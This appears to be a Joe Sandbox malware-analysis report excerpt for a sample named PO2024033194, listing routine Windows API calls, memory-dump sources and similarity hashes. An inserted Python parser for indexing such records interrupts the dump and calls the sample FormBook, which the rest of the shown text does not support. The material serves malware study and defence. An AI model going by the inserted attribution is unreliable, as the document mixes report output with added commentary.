• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
• Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
• Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
• Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
• Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
• Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
• Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
APIs
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
• Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
• Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
• Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
• Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
• Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
• Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
• Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
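The function records above (an APIs list, the memory-dump source, and a Similarity block with the API ID and fuzzy hashes) are what an analyst actually hunts over across reports: which functions touch WSOCK32, which fuzzy hashes recur between samples, how the import profile shifts between builds. The following parser is an added example, not part of the Joe Sandbox report or the Joe Sandbox product; the record layout it assumes is the plain-text shape shown on this page, the field names it produces are its own, and the sample text is two records copied from this report with the repeated "Associated:" lines left out.

```python
"""Parse Joe Sandbox-style function records (APIs / Memory Dump Source /
Similarity) into structured objects for indexing and cross-sample hunting.
Added example; the layout assumed is the plain-text form of this report,
not an official Joe Sandbox export format."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from the report above, minus the
# repeated "Associated:" lines (they are identical for every function here).
SAMPLE = """\
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
• Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
• Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
• Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
"""

# One API line: optional "Part of subcall function <addr>: " prefix, then
# func.MODULE, optional (args), optional comma, then "ref: <addr>".
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<func>[A-Za-z_][\w@$?]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTION_HEADERS = ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


@dataclass
class Call:
    module: str
    func: str
    ref: int                      # address of the call site in the image
    args: tuple[str, ...] = ()    # as printed; "?" means Joe Sandbox could not resolve it
    subcall_of: int | None = None  # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    calls: list[Call] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)  # Similarity / dump metadata

    def imports(self) -> set[str]:
        """Direct MODULE!func references, excluding calls attributed to subcalls."""
        return {f"{c.module}!{c.func}" for c in self.calls if c.subcall_of is None}


def parse_report(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                 # every record starts with this header
            records.append(FunctionRecord())
            section = "apis"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if not records:
            continue                       # preamble before the first record
        body = line.lstrip("•").strip()   # drop the bullet, keep the payload
        if section == "apis":
            m = CALL_RE.match(body)
            if m:
                args = tuple(filter(None, (m["args"] or "").split(",")))
                caller = int(m["caller"], 16) if m["caller"] else None
                records[-1].calls.append(
                    Call(m["module"], m["func"], int(m["ref"], 16), args, caller))
            continue
        m = KV_RE.match(body)
        if m:
            records[-1].fields[m["key"].strip()] = m["value"].strip()
    return records


def records_importing(records: list[FunctionRecord], module: str) -> list[FunctionRecord]:
    """Functions that reference a given module, e.g. WSOCK32 to locate network code."""
    module = module.upper()
    return [r for r in records if any(c.module.upper() == module for c in r.calls)]


def import_profile(records: list[FunctionRecord]) -> dict[str, int]:
    """Number of functions referencing each MODULE!api; a compact fingerprint
    to diff against another sample's report."""
    counts: dict[str, int] = {}
    for r in records:
        for imp in r.imports():
            counts[imp] = counts.get(imp, 0) + 1
    return counts


def fuzzy_hashes(records: list[FunctionRecord]) -> dict[str, str]:
    """Instruction Fuzzy Hash -> API ID, for a quick lookup table across samples."""
    return {r.fields["Instruction Fuzzy Hash"]: r.fields.get("API ID", "")
            for r in records if "Instruction Fuzzy Hash" in r.fields}


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for r in recs:
        print(r.fields.get("API ID"), sorted(r.imports()))
    print("network functions:", len(records_importing(recs, "WSOCK32")))
```

Feed it the text of a whole report and the three helpers give you the pieces worth keeping: the list of functions that touch the network stack, an import profile to diff against the next FormBook build, and a fuzzy-hash table to see which functions recur between samples. Subcall lines are kept (with the caller address) but excluded from the import profile, so a function is not credited with APIs it only reaches indirectly.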
                                                                  APIs
                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                                                  • EndPath.GDI32(?), ref: 00447336
                                                                  • StrokePath.GDI32(?), ref: 00447344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 2783949968-0
                                                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 00472B63
                                                                  • GetDC.USER32(00000000), ref: 00472B6C
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                                                  • GetDC.USER32(00000000), ref: 00472BBB
                                                                  • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                  APIs
                                                                  • __getptd_noexit.LIBCMT ref: 00415150
                                                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
